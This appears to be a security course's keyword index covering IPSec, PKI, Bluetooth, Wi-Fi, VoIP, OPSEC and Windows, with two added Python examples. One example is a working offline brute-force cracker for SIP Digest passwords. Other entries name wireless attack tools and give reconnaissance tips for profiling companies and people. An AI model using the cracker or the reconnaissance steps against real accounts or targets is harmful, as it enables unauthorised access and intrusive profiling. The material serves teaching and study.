VPN - MPLS (multiprotocol label switching)    4    88     helps to provide QoS over traditional IP service, QoS requires looking into the message to decide which message has high priority but this can't be done because of encryption (MPLS/VPN)
VPN - Remote access type                      4    89     client to site , site to site , client to client
VPN =>Client - to - site (transport)          4    89
VPN => Site - to - Site (tunnel)              4    89
VPN => Client to client                       4    89     not used anymore
VPN - security problems                       4    90
IPSec                                          4    92      RFC 2401, scale from small to v. large networks, commonly implemented.
IPSec - Replay attack                          4    92      is to copy the msg from the network & retransmit it even if the attacker can't understand it, this would cause undesired results, ex: retransmitting a request packet to transfer $1000
IPSEC - Headers                                4    92      Authentication Header (AH), Encapsulated Security Payload (ESP)
IPSec - authentication header (AH)             4   93-94    Integrity, no confidentiality, anti-replay, origin authentication
IPSec - AH => ICV (integrity check value)      4    93      to prevent spoofing the IP address and to verify integrity, that no one has tampered with the info.
IPSec - encapsulation security payload (ESP)   4   94-95    Integrity (not perfect integrity), confidentiality, anti-replay, origin authentication
IPSec - Null algorithm                         4    95      it does nothing to the msg, used if you want to turn off encryption on IPSEC
Null Algorithm                                 4    95      it does nothing to the msg, used if you want to turn off encryption on IPSEC
IPSec - mode types                             4    96      tunnel mode, transport mode
IPSec - Tunnel mode & AH                       4    96      authentication, integrity
IPSec - Tunnel mode & ESP                      4    97      encryption, authentication.
IPSec - session establishment                  4    97      the two sides of the connection must agree on what options they are going to use, Security Association
IPSec - Security Associations                  4    97      critical part of IPSEC, they document the security services (transforms) that are used by a specific IPSEC connection, & must be agreed on by both sides of the IPSEC
IPSec - internet key exchange IKE              4    97      ISAKMP (internet security association and key management protocol), protocol used by IPSEC to negotiate the session details of a connection and then document them as SAs.
IKE internet key exchange                      4    97      protocol used by IPSEC to negotiate the session details of a connection and then document them as SAs.
IPSec => IKE =>ISAKMP                          4    97      key management
ISAKMP                                         4    97      key management
IPSec => IKE => Oakley                         4    97      key exchange
Oakley                                         4    97      key exchange
IPSec => IKE => SKEME                          4    97      secure key exchange mechanism, extends the capabilities of Oakley.
SKEME                                          4    97      secure key exchange mechanism, extends the capabilities of Oakley.
IPSec=>phase one => main mode                  4    98      check the identity of the participant
IPSec=>phase one => aggressive mode            4    98      does not check the identity of the participant
IPSec=>phase two => quick mode                 4    98
SSL VPN                                        4    99      should open firewall ports 80 & 443
SSL portal VPNs (Client - Site)                4    99      Client - Site, accessible to more user than SSL tunnel VPNs( site - Site)

SSL tunnel VPNs                                4   99-100   quite different from IPSEC tunnels, in that SSL tunnels are always created by non-standard tunneling methods while IPSEC uses standard methods

VPN - GRE                                      4    101     to securely bridge any non-IP networks (IPX, AppleTalk) over an IP network
VPN - L2TP                                     4    102     to securely bridge dial-in users.
VPN - PPTP                                     4    101
VPN - L2F                                      4    101
IPSec - NAT                                    4    102     NAT is incompatible with IPSec AH ,but NAT can be used with IPSec ESP in two modes tunnel and transport
PGP - history                                  4    104
PGP - protects emails                          4    104     PGP provides confidentiality through encryption, integrity & source identification through digital signatures.
PGP -encryption                                4    105
PGP - On the fly encryption                    4    106     hard disk encryption, files are encrypted on the disk, and decrypted to be read.
PGP - encryption & digital signature           4    107     can be used to digitally sign a message, uses SHA-1 (1024, 2048 min key) to generate the digest, & uses its private key to encrypt it, and the receiver would use the sender's public key to decrypt the digest and validate it
PGP - Private passphrase                       4    108     most critical part of key generation, password protects your stored private key
E-mail - encrypting                            4    109
E-mail - decrypting                            4    111
E-mail - signing                                          4   112
E-mail - sign confirming                                  4   113

PKI                                                       4   115   allows users to exchange encrypted information over a public network, hierarchical infrastructure system used to create digital certificates.

PKI - Verisign                                            4   115   a certification authority
Verisign                                                  4   115   a certification authority
CAC - Common access card                                  4   115
CAs - Certificate authorities                             4   117   create certificates based on the user's identity information
CPS - Certificate practice statement                      4   117
PKI servers types                                         4   118   Root CA, Intermediate CA, Issuing CA
Internal PKI                                              4   118   some companies use PKI as the basis for NAC solutions.
External PKI                                              4   118
Certificate authorities trust models                      4   119   hierarchical, Bridge, Mesh, Hybrid
Certificate authorities models-hierarchical               4   119
Certificate authorities models-Bridge CA                  4   119
Certificate authorities models-Mesh                       4   119
Certificate authorities models-Hybrid                     4   119
Certification life cycle                                  4   120
PKI - Certification life cycle                            4   120
Certification life cycle - registration & initialization  4   120
DN - Distinguished Name                                   4   120   person or entity who wants the certificate provides their identification in the form of a DN.
Certification life cycle - key storage                    4   121   by S/W (client browser) or H/W (TPM, CAC "Common Access cards")
Certification life cycle - key ceremony                   4   121   client browser
Software key store                                        4   121   smart card
Hardware key store                                        4   121
TPM - Trusted privacy Module                              4   121
Certification key Escrow                                  4   122   key backup
Certification life cycle - expiration date                4   122
Certificate revocation list                               4   122
key recovery                                              4   122
Digital certificate                                       4   123   X.509 certificate
Certificate policies document                             4   124   the documentation that specifies how certain certificate are to be used, tcp port 443
X.509 extensions                                          4   124   to distinguish between the certificates issued for browser and for server
SSL (Secure Socket Layer)                                 4   125   is one use of PKI to encrypt msgs between web server and web browser, done by SSL & TLS, client & server use PKI certificates (asymmetric) to negotiate a session key (symmetric)
TLS(Transport layer security)                             4   127   SSL Steps from client to server
SSL handshake                                             4   128   SSL Steps from client to server
PKI SSL handshake                                         4   128   SSL Steps from client to server
SSL PKI crypto                                            4   128   SSL Steps from client to server
PKI SSL crypto                                            4   128   SSL Steps from client to server
Secure E-mail (S/MIME)                                    4   129   another use of PKI is to encrypt or digitally sign e-mail messages, built in to many mail clients, Outlook, BlackBerries
S/MIME - Secure E-mail                                    4   129   another use of PKI is to encrypt or digitally sign e-mail messages, built in to many mail clients, Outlook, BlackBerries
Disk encryption                                           4   130   another use of PKI is to create certificates to be used for disk encryption
PKI - Disk Encryption                             4   130   another use of PKI is to create certificates to be used for disk encryption
Cold boot attack                                  4   130   dumping the data from the memory and use it to work around disk encryption to be able to read the data
PKI - other uses                                  4   131   NAC, NAP, Code & driver, General Uset Authn., Wireless Authen., IPSEC & VPN Authen., Digital Signature.
PGP - as Web of trust                             4   132   to use it like the PKI
PGP - Trust Depth Level                           4   132   to limit how much of this web you trust.
PGP - Trust establishment                        4   133   trusting a certificate is not the same as trusting a person.
PGP - certificate's fingerprint                   4   133   used to trust the integrity of this certificate.
certificate's fingerprint                         4   133   used to trust the integrity of this certificate.
Signature & certificate revocation                4   133   at PKI
PKI - Signature & certificate revocation          4   133
biometric words                                   4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
PKI - biometric words                             4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
PKI problems                                     4   135   incomplete standards, certification of CAs (directly affects how secure the entire PKI based upon them is), cross-certificates between CAs, user education or perception, lack of critical mass
Wireless devices                                  4   143   PDA, Mobile phones, Laptops, Pagers, HVAC control units.
Wireless advantage                                4   144
Vertical markets of wireless                      4   146   Healthcare, Financial, Academia, Factories/industrial, Retail, Wireless ISP
ROI(return on investment)                         4   147   huge ROI of wireless on the hospitals (healthcare) industry.
POS (point of sale)                              4   147   retail chains are migrating toward wireless networks to extend their point-of-sale (POS) solutions.

Bluetooth                                        4   149   is a cable replacement technology, no line-of-sight, supports (data, voice, and other applications), can support up to 7 simultaneous connections.

Bluetooth classes 1, 2, and 3                    4   150   class 2 most commonly found in wireless cards, phones, laptop computers
Bluetooth specification                           4   150   Range: 1m,10m,100m, Max BW= 2.1 Mbps, Freq= 2.5 GHz (FHSS) EDR
EDR - enhanced data rate bluetooth spec.          4   150   improve the rates of Bluetooth upto 2.1 Mbps
FHSS - frequency hopping spread spectrum         4   150   hops between 79 different channels in 2.4GHz, used @ Bluetooth, provides a high degree of interference immunity.
Bluetooth security                                4   151   PIN, encrypt transferred data using a security key generated by using PIN & Bluetooth MAC
PIN - Personal Identifier Number                 4   151   used @ Bluetooth to authenticate devices together, entered manually @ each device.
BD_ADDR                                           4   151   is the MAC address of the Bluetooth Device.

Bluetooth Security keys                          4   151   when two devices connect for the first time, they use the PIN & BD_ADDR to generate permanent link keys that are stored on each device
HMI - human to machine interface                 4   151   the ability to communicate with the machine to insert inputs and commands for it, @ Bluetooth. The lack of HMI results in fixed PIN selection for Bluetooth devices like handsets ('0000' or '1234').
Bluetooth security issues                         4   152   eavesdropping attacks,
SIG - Bluetooth Special Interest Group           4   151

SAFER+ cipher by Cylink                          4   152   is the Bluetooth algorithm that is used for encryption and authentication, & is a submission candidate for the AES algorithm, 128-bit key

PIN brute force                                   4   152   4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
brute force PIN                                   4   152   4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
BlueSniff                                        4   152   tool to attack Bluetooth, can locate and circumvent the security of Bluetooth networks.
RedFang                                          4   152   tool to attack Bluetooth, can circumvent the security of Bluetooth networks.
Bluetooth protocol analyzer                       4   152   can passively capture and record all Bluetooth network activity within range
BNEP - Bluetooth Network Encapsulation Protocol   4   152   protocol used to configure Bluetooth devices to extend access to the wired network over a wireless network, like 802.11
non-discoverable mode                            4   153   prevents Bluetooth devices from being discoverable. But devices in this mode should still respond to the PAGE_request from another Bluetooth device.
BlueScanner                                       4   154   tool for XP-SP2 allows user to discover nearby Bluetooth networks, and categorize by type and service they offer.
BlueSnarf attack                                4   155   many of the Bluetooth vulnerabilities are on the application layer, allow retrieval of phonebook & calendar, attacker remotely creates a virtual serial connection, this allows AT commands to be sent to the phone
Bluetooth sniffing impact                       4   156   attacker could capture the data exchanged between Bluetooth keyboard, mouse and desktop/laptop system, could inject keystrokes remotely
Bluetooth protection                            4   157   1- configure devices in non-discoverable mode, 2- audit Bluetooth environment, 3- use strong PIN (12-digit), 4- vendors should implement SIG 2.0 Specs/PKI support.
ZigBee - wireless                               4   158   Based on 802.15.4 Specs, low cost, cable-replacement tech
ZigBee - specification                          4   159   Range: 10m - 75m, Rate= [ 250 Kb/s @ 2.4 GHz, 40 Kb/s @ 915 MHz, 20 Kb/s @ 868 MHz], Freq= 868 MHz, 915 MHz, 2.4 GHz (DSSS), low power consumption
ZigBee - long battery life                      4   159   ZigBee accommodates long battery life by limiting the amount of time the radio is used, the system remains inactive until receiving a command to enable the light.
ZigBee - security                               4   161   encryption based on AES-CCM (AES-Cipher block chaining-msg Authentication Code(CBC-MAC))
ZigBee - security                               4   161   provides security over: MAC (layer 2), Networks (layer 3), Applications (layer 7), however the same key is used over the three layers, selection of the key is done @ installation time by: manufacturer, installer, or end-user
rijndael cipher - AES @ ZigBee                  4   161   also provides integrity protection that prevents encrypted traffic from being altered during transmission
IEEE 802.11 wireless                            4   163   supports Ad-hoc, Infrastructure networks, 802.11a, 802.11b, 802.11g, 802.11n
IEEE 802.11 specification                       4   163
WEP - security issues                           4   165   weakness in the key scheduling algorithm of RC4, attacker could recover the shared secret from nothing more than the encrypted data collected from the wireless network
WEP - tools attack                              4   166   WEP crack , Airsnort , dwepcrack ,wnet/reinj , wepwedgie
IEEE 802.11i                                    4   167   accommodates two replacements for WEP: (TKIP, CCMP), provides strong encryption, replay protection, integrity protection (using: TKIP or CCMP), but doesn't provide authentication
TKIP - Temporal Key Integrity Protocol          4   167   one of the 802.11i protocols that provides: encryption, replay protection, integrity protection, works on the same WEP H/W chip
CCMP - Counter-Mode/CBC-MAC Protocol            4   167   one of the 802.11i protocols that provides: encryption, replay protection, integrity protection, requires a H/W chip to implement
IEEE 802.1x                                     4   167   provides network authentication, by using: EAP
EAP - Extensible Authentication Protocol        4   167   authentication protocol that provides network authentication. The EAP used varies according to the clients' OS and the back-end authentication systems (Windows: Active Directory, LDAP, RADIUS)
EAPOL - EAP over LAN                            4   168   EAP over lan(EAPOL), the supplicant uses EAPOL to communicate with the Authenticator
EAP over RADIUS                                 4   168   the Authenticator uses EAP-over-RADIUS to pass the supplicant request to the Authentication Server
IEEE 802.1x authentication - Deployment         4   168   need three components: 1-supplicant, 2-Authenticator, 3-Authentication Server
WPA - (Wi-Fi protected access)                  4   170   the Wi-Fi Alliance adopted the AES-CCMP cipher mechanism designed for the new hardware
WPA2                                            4   170   results from the testing process for compliance with TKIP and AES-CCMP.
wireless - general misconception                4   172
wireless - I do not need to worry about security   4   172
wireless-We don't have any wireless             4   172
wireless - technical misconception              4   174
wireless - risk misconception                   4   176
wireless - eavesdropping                        4   179
wireless - eavesdropping mitigation             4   180
wireless - masquerading                         4   181
wireless - masquerading - captive web           4   181
wireless - masquerading mitigation              4   182
wireless - TTLS                                 4   182
wireless - PEAP                                 4   182
wireless - denial of service                    4   183
wireless - flaws in WiFi card firmware          4   184
wireless - denial of service (DoS) mitigation   4   185   prepare an appropriate response strategy and IDS to react quickly against the attacker
wireless - Rogue AP                                4    186
wireless - Rogue AP mitigation                     4    187
wireless - secure WLAN planning                    4    189
wireless - network protecting                      4    190
VOIP overview                                      4    196

VOIP risk (Key Risks)                             4    197      internal risk, internal misuse, theft, system malfunction, service interruption, config error, improper change management.

VoIP - External attacks                            4    197      DOS and external attacks
VoIP - Internal misuse                             4    197      sniffing voip traffic
VoIP - theft                                       4    197
VoIP - system malfunction                          4    198
VoIP - service interruption                        4    198      due to Network BW, QOS, Power failure
VoIP - configuration error                         4    198
VoIP - improper change management                  4    198
VOIP - LAN                                         4    199      LAN is more reliable and faster than WAN
VOIP - WAN                                         4    200      quality may vary significantly.
VOIP - VoIP networking                            4    201      combine data and voice, to extend voice over packet switching, the motivator for implementing it is ROI
VoIP - packetized                                  4    201
VOIP - advantages 1                               4   202-203   cost savings, voice compression: T1 supports max 24 circuit-switched conversations, by compressing it we better utilize BW in a packet-
VOIP - advantages 2                               4   202-203   switched net, we can reduce BW from 64 kbps/call -> 6 kbps/call, new services "Click to Call", location independence
VoIP - click-to-call                               4    203      click on URL of website to initiate call over VoIP network
VoIP - as a smart network                          4    203      provide possibility for new features & services
VOIP - disadvantage => quality assurance challenge   4    204
VOIP - delay types                                4    205      1- accumulation delay (algorithm delay), 2- processing delay, 3- network delay
VoIP - disadvantage => jitter                     4    205
VoIP - disadvantage => delay                      4    204      Echo, Talker overlap
VoIP - disadvantage => lost-packet compensation   4    205
VoIP - disadvantage => echo compensation          4    206
VOIP - source of delay                             4    205
VOIP disadvantage=>reliability&availability        4    207
VOIP - architecture=>                              4   208-209
VOIP - architecture => PSTN PBX/VoIP integration   4    208      PBX connected to PSTN with VoIP. VoIP connects multiple PBXs together to provide connectivity to end-users with VoIP phones
VOIP - architecture => IP PBX/PSTN integration     4    208      all users utilize VoIP phones to connect to the IP PBX and the IP PBX connects with the PSTN
VOIP - architecture=> pure VoIP networks           4    209      also known as "walled garden".VoIP network connect with another VoIP using hostname or IP for dialing instead of phone #
VOIP - architecture=> VoIP/PSTN ISP                4    209

VOIP - components                                 4   210-211   Media gateways, Registration and Location server, Proxy servers, Message Servers, End-user device, VoIP phones, FXS, soft phone

VOIP - traffic patterns                           4    212      call setup stream & voice stream, once the setup phase has completed, caller "Bob" creates a direct connection to recipient Alice to avoid latency

VOIP - call operation                             4    212      call setup goes through the proxy server, next a direct connection is made
VOIP - protocols                                   4    214      Signaling (H.323, SIP), Media (RTP), Supporting (necessary protocols to support VOIP signaling and media "TCP, UDP, IP")
VOIP - Signaling - H323                           4    215      provides both Voice & Video, uses UDP or TCP, standardized by ITU and based on the ASN.1 "Abstract Syntax Notation" standard
VOIP - Signaling - H323                            4    215      is a set of protocols include: H.225, H.245, H.235, H.239
VOIP - Signaling - ASN.1                           4    215      for specifying data that can be challenging to implement securely in a modular or "light weight" fashion
VOIP - SIP (Session initialization protocol)   4   216   similar to HTTP's GET and POST methods. Most implementations of SIP run over UDP for performance. Extensible
VOIP - SIP packet details                     4   217   All in ASCII strings, 1- Request Line (register, invite, ack, cancel, bye, options), 2- Msg header, 3- msg body (optional)
VOIP - CID "Caller ID"                        4   217   CID (caller id info), included in the Msg header
VOIP - SIP packet => message header            4   217   information indicating the source and destination of the call, and caller identification information (CID)
VOIP - SIP packet => message body              4   217   protocol negotiation details, encoding mechanism (for compression), IP address info.
VOIP - SIP packet Exchange                    4   218   see diagram @ book
VOIP - RTP "real-time protocol"               4   220   used to transport packetized voice, end-to-end protocol, does not need to traverse a gateway server, commonly UDP
VOIP - real-time control protocol RTCP        4   220   reporting statistics about the RTP session including jitter, packet loss ... and can control the flow of information between two VoIP endpoints
VOIP - TCP vs UDP                             4   221   UDP is preferred for VoIP network because it has less overhead (smaller header size and no ack)
Skype                                         4   222   proprietary VOIP, clients relay traffic for each other (P2P)
VOIP - operation challenge                    4   224

VOIP - NAT challenges                         4   224   the firewall passes SIP to set up the call, then the recipient answers the call, the RTP attempts to contact the internal IP but the stateful FW drops it unless it does inspection

VOIP - quality concern                             4    224
VOIP - E911 location reporting                     4    224      a VoIP endpoint is not tied to a physical line, so the caller's location cannot be determined for emergency purposes
VOIP - wiretapping support                         4    225      supporting lawful eavesdropping (wiretaps) is harder than on the traditional phone network
VoIP - provider taxation                           4    225      taxation proposed because of the revenue losses caused to the telecom providers
VOIP - security challenges (vulnerabilities)       4    226      CID spoofing, phone impersonation (limited strong authentication: weak PINs, SIP Digest dictionary attacks), DoS (SIP CANCEL), implementation attacks
VoIP - CID spoofing and privacy attack             4    226      the From header is written by the caller, so the displayed caller ID cannot be trusted
VoIP - impersonation                               4    226
VoIP - limited HID                                 4    227
VoIP - SIP Digest authentication attack            4    227      attacker sniffs the server's nonce and the client's digest response, then brute-forces or dictionary-attacks the password offline; short numeric PINs fall quickly
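What "brute force it offline" means in practice for the row above: the digest is MD5(MD5(user:realm:password):nonce:MD5(method:uri)) (RFC 2617 without qop, the form most SIP phones use), and everything except the password is in the sniffed packets. The block below is an added example, not course material. The "captured" Authorization header is constructed inside the block from a deliberately weak four-digit PIN so that the attack can be run offline; the realm, nonce and extension number are made up.

```python
"""Offline dictionary attack on SIP Digest authentication (RFC 2617 MD5
digest as used by SIP REGISTER).  Added example; the captured exchange
below is constructed, not sniffed from a real network."""
import hashlib
import re


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce) -> str:
    """The response a phone sends back for a server nonce (no qop)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_digest_header(header: str) -> dict:
    """Pull the quoted parameters out of an Authorization header."""
    return dict(re.findall(r'(\w+)="([^"]*)"', header))


# --- constructed capture -------------------------------------------------
# The attacker sniffs two UDP packets: the 401 challenge (nonce) and the
# phone's second REGISTER carrying the digest.  Extension 1001 uses a
# four-digit PIN as its password (a constructed weak choice).
_VICTIM_PIN = "2580"
CAPTURED_NONCE = "3f2e1d0c4b5a69788796a5b4c3d2e1f0"
CAPTURED_REGISTER_AUTH = (
    'Digest username="1001", realm="sip.example.com", '
    f'nonce="{CAPTURED_NONCE}", uri="sip:sip.example.com", '
    f'response="{digest_response("1001", "sip.example.com", _VICTIM_PIN, "REGISTER", "sip:sip.example.com", CAPTURED_NONCE)}", '
    'algorithm=MD5'
)


def crack_sip_digest(auth_header: str, method: str, wordlist):
    """Recompute the digest for each candidate; a match reveals the password.
    Nothing is sent to the server, so lockout or rate limiting never fires.
    The nonce changes per exchange, so unlike an unsalted hash this cannot
    be precomputed; it has to be redone per capture, which is cheap anyway."""
    p = parse_digest_header(auth_header)
    for candidate in wordlist:
        if digest_response(p["username"], p["realm"], candidate,
                           method, p["uri"], p["nonce"]) == p["response"]:
            return candidate
    return None


def all_pins(digits: int = 4):
    """Every numeric PIN of the given length: the keyspace a phone keypad invites."""
    return (str(i).zfill(digits) for i in range(10 ** digits))


if __name__ == "__main__":
    print(crack_sip_digest(CAPTURED_REGISTER_AUTH, "REGISTER", all_pins()))
```

The method matters: the same capture tried against "INVITE" never matches, because HA2 covers the method and URI. The defence is on the password side (long, non-numeric credentials, TLS for signaling so there is nothing to sniff), not on the digest.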
VoIP - DoS vulnerability - SIP CANCEL              4    227      calls are torn down by sending forged SIP CANCEL messages
VoIP - call hijacking                              4    228      attacker takes over the identity of a legitimate user
RTP stream manipulation                            4    228      man-in-the-middle attack on the media stream
RTP sniffing                                       4    228      with tools like Wireshark (unencrypted RTP can be captured and played back)
RTP replay attack                                  4    228      attacker records a specific telephone conversation, then replays/broadcasts the content to a large number of VoIP users
VOIP - securing best practice                      4    229      1- audit the implementation to assess traffic patterns, 2- tunnel traffic with IPsec, 3- use firewalls that understand SIP/H.323, 4- monitor logging data, 5- isolate VoIP traffic on a dedicated channel
OPSEC - management app. Operations security        4    236      OPSEC focuses on establishing a process for identifying the weak links adversaries often exploit; one size does not fit all, so adjust and develop the process for your specific needs
OPSEC - The Pentagon pizza delivery story          4    236      seemingly harmless details (a surge in late-night pizza deliveries) can reveal sensitive activity; keep the details private
OPSEC - three laws of defense                      4    237      1- know the threat, 2- know what to protect, 3- if you fail at the first two, the enemy wins
OPSEC - weekly assessment cycle                    4    238      five steps [consideration]
OPSEC - 5 steps                                    4    238
employee issues - OPSEC                            4    239
screening & selection of employees - OPSEC         4    239      investigate candidates before hiring them (background and history checks); make sure HR is actually doing this work
separation of duties - OPSEC                       4    240      look for ways to split a task across multiple positions so no single person controls it end to end
rotation of duties                                 4    240      regularly rotate positions to reduce the opportunity for collusion between employees
termination agreement                              4    240      used to minimize the problems a dismissed employee could cause
employment agreement                               4    241      non-competition, non-solicitation, non-disclosure agreement (NDA), intellectual property
Non-Competition                                    4    241      you cannot work for a competitor
Non-Solicitation                                   4    241      if you leave, do not take anyone with you
NDA - Non Disclosure Agreement                     4    241      you cannot disclose sensitive information outside the company
intellectual property                              4    241      the organisation owns what you develop while employed
Need to know - OPSEC                               4    242      access is available only when, where and to what is necessary, according to business requirements and combined with the least privilege concept
least privilege - OPSEC                            4    242      ensures that only the minimum required access rights are granted at any time
OPSEC - putting it all together                    4    243
Nick Leeson and Barings Bank - OPSEC               4    243      Leeson ran both trading and settlement in Singapore, so he could hide losses that sank the bank in 1995: a separation-of-duties failure
OPSEC - sensitive information                      4    245      mark sensitive information by level; a mandatory security policy must be enforced
Backup access - OPSEC                              4    245      having backup access gives the right to copy, erase or overwrite files, so it is dangerous in the hands of a malicious user
Backup plan (schedule) - OPSEC                     4   245,246   you need a backup plan, and do not assume it works until you have fully tested it, including a full recovery
destruction plan - OPSEC                           4    246      should be implemented to avoid accumulating information that is no longer useful or in use
offensive OPSEC                                   4    248
OPSEC- mail example                               4    248
OPSEC -Extract Knowledge                          4    250
OPSEC - protecting against OPSEC failure          4    253
offensive OPSEC process                            4    254      1- identify your target, 2- collect open source or other information, 3- estimate (capacity, upcoming products, business vulnerabilities, approach to marketing, ...)
competitive intelligence                           4    254      collecting open source information on a corporation
competitive intelligence ethics                    4    255
Open Source Collection - OPSEC                     4    257
OPSEC - corporate information                      4    257      change in ownership, owner stock purchase or sale, employee stock option plans
EDGAR DB                                           4    257      at the Securities and Exchange Commission; annual and quarterly reports are goldmines of information
fdcenter.org                                       4    257      Foundation Center, for private foundations
EDGAR search                                       4    259      returns the documents filed by the company
Whois DB                                           4    260      gives contact info (names, addresses, emails, phone numbers) and DNS server information
robots.txt                                         4    261      lists the paths the site owner does not want crawled, which often points at unlinked pages worth a look
Wayback                                            4    262      www.archive.org takes snapshots of websites a few times a year, so removed content may still be retrievable
open source collection - info from other web sites 4    265      www.fundrace.org, Google.com (business partner pages, phone listings, software and hardware used), www.monster.com, www.gao.gov (US General Accounting Office)
monster.com                                        4    265      employment website; job postings reveal the company's infrastructure (required skills = products in use)
open source collection - company financials        4    266
open source collection - product info              4    267      the big three credit reporting agencies
open source collection - individual info           4    268      www.intelius.com
open source collection - about me                  4    269
Keyword                                      Book       Page
Windows OS                                         5      5
Windows XP Home Edition                            5      6
Windows XP SP2 features                            5      7
DEP                                                5      7
Data Execution Prevention                          5      7
RPC/DCOM                                           5      7
raw TCP sockets                                    5      7
Windows XP SP3 features                            5      8
Internet Explorer                                  5      8
Windows Server 2003                                5      9
Windows Server 2003 Web                            5      9
Windows Server 2003 R2                             5     10
DFS (Distributed File System)                      5     10
ADFS                                               5     10
ADAM                                               5     10
Active Directory Application Mode                  5     10
Windows Vista                                      5     11
BitLocker drive encryption                         5     11
UAC (User Account Control)                         5     11
Internet Explorer 8                                5     12
smart card EFS                                     5     12
Windows Firewall with Advanced Security            5     12
AppLocker (Application Locker)                     5     12
DirectAccess                                       5     12
Windows Server 2008                                5     14
Windows Server 2008 features                       5     14
modularization in Server 2008                      5     14
Server Core                                        5     14
IIS 7                                              5     15
RODC (Read Only Domain Controller)                 5     15
NAP (Network Access Protection)                    5     15
SSTP (Secure Socket Tunneling Protocol)            5     15
Routing and Remote Access Service                  5     15
RRAS                                               5     15
Remote Desktop Services application                5     15
RDP (Remote Desktop Protocol)                      5     15
PowerShell                                         5     15
Hyper-V (hypervisor)                               5     15
Windows Server 2008 R2                             5     16
BranchCache                                        5     16
Windows Mobile                                     5     17
SDHC slot                                          5     17
ActiveSync                                         5     17
System Center Mobile Device Manager                5     17
Windows Mobile hardening                           5     17
anti-malware scanner                               5     18
data encryption and access control                 5     18
Windows Mobile best practices                      5     19
workgroup                                          5     21
workgroup characteristics                          5     21
workgroup benefits                                 5     23
workgroup disadvantages                            5     24
local accounts - management                        5     25
SID (security ID)                                  5     26
SID - well-known SIDs and RIDs                     5     26      e.g. S-1-5-18 Local System, S-1-5-32-544 BUILTIN\Administrators; RID 500 is always the built-in Administrator even if renamed
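SIDs are stored in binary in tokens, ACLs and registry hives, and the string form S-1-... is what tools print. The block below is an added example, not course material: it decodes the binary layout, re-encodes it, and names the well-known SIDs and RIDs from the rows above. The well-known table is a subset chosen for the example; the two byte strings are hand-built from the documented layout, and the domain SID is made up.

```python
"""Decode binary SIDs to the S-1-... string form and name well-known ones.
Added example, not course material; the byte strings are hand-built
samples and the domain SID is invented."""
import struct

# Subset of Microsoft's well-known SIDs/RIDs, enough for the demo.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-7": "Anonymous Logon",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "Local System",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-547": "BUILTIN\\Power Users",
}
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}


def sid_from_bytes(blob: bytes) -> str:
    """Layout: revision(1) | sub-authority count(1) | identifier authority
    (6 bytes, big-endian) | count x sub-authority (4 bytes each, little-endian)."""
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack(f"<{count}I", blob[8:])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def sid_to_bytes(sid: str) -> bytes:
    """Inverse of sid_from_bytes, for building test data or patching ACLs."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def describe(sid: str) -> str:
    """Exact well-known match first, then the RID of a domain/machine
    account (S-1-5-21-<three sub-authorities>-<RID>)."""
    if sid in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[sid]
    parts = sid.split("-")
    if sid.startswith("S-1-5-21-") and len(parts) == 8:
        rid = int(parts[-1])
        name = WELL_KNOWN_RIDS.get(rid, "domain/local account")
        return f"{name} (RID {rid}) in domain S-1-5-21-{'-'.join(parts[4:7])}"
    return "unknown"


# Hand-built samples as they would appear in a hex dump.
BUILTIN_ADMINS_BLOB = bytes.fromhex("01 02 000000000005 20000000 20020000")
LOCAL_SYSTEM_BLOB = bytes.fromhex("01 01 000000000005 12000000")
# The built-in Administrator keeps RID 500 even when renamed, which is why a
# renamed admin plus decoy account does not fool anyone who reads SIDs.
RENAMED_ADMIN_SID = "S-1-5-21-3623811015-3361044348-30300820-500"

if __name__ == "__main__":
    for blob in (BUILTIN_ADMINS_BLOB, LOCAL_SYSTEM_BLOB):
        s = sid_from_bytes(blob)
        print(s, "=", describe(s))
    print(RENAMED_ADMIN_SID, "=", describe(RENAMED_ADMIN_SID))
```

`whoami /all` (p. 28) prints the string form for the current token; this is what it is printing from.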
SAT (Security Access Token)                        5     28
whoami /all /fo list                               5     28
Active Directory domain                            5     32
domain controllers                                 5     32
access control list ACL                            5     32
multi-master replication / AD                      5     32
PDC                                                5     32
BDC                                                5     32
time stamp and update sequence number (USN)        5     32
Registry vs. Active Directory                      5     33
global vs. local users and groups                  5     33
RODC credentials                                   5     33
Active Directory store                             5     32
Active Directory size                              5     33
SAT (Security Access Token)                        5     35
Kerberos                                           5     36
Kerberos process                                   5     36
Kerberos - protocols used                          5     36
Kerberos cracker                                   5     37
NTLM                                               5     38
Forest & trust                                     5     39
Forest & trust - inter-domain replication          5     39
global catalog server                              5     39
global catalog GC                                  5     39
schema                                             5     39
configuration naming context                       5     39
Forest & trust - two-way transitive trust
trust nature                                       5     41
cross-forest trust                                 5   42,43
transitive trust                                   5     42
trust direction                                    5     42
group policy                                       5     44
GPO Group Policy Objects                           5     45
Group Policy Management Console                    5     46
Service Pack                                       5     52
Service Pack problem discovery                     5     52
service pack staged deployment                     5     53
slipstreaming                                      5     54
automate SP install (hands-free SP)                5     55
automate SP with group policy                      5     56
schtasks.exe                                       5     55
exec.vbs                                           5     55
psexec.exe                                         5     55
service pack batch installation                    5     55
net.exe use                                        5     55
update.msi                                         5     56
hotfix                                             5     57
roll-up                                            5     57
cumulative hotfixes                                5     57
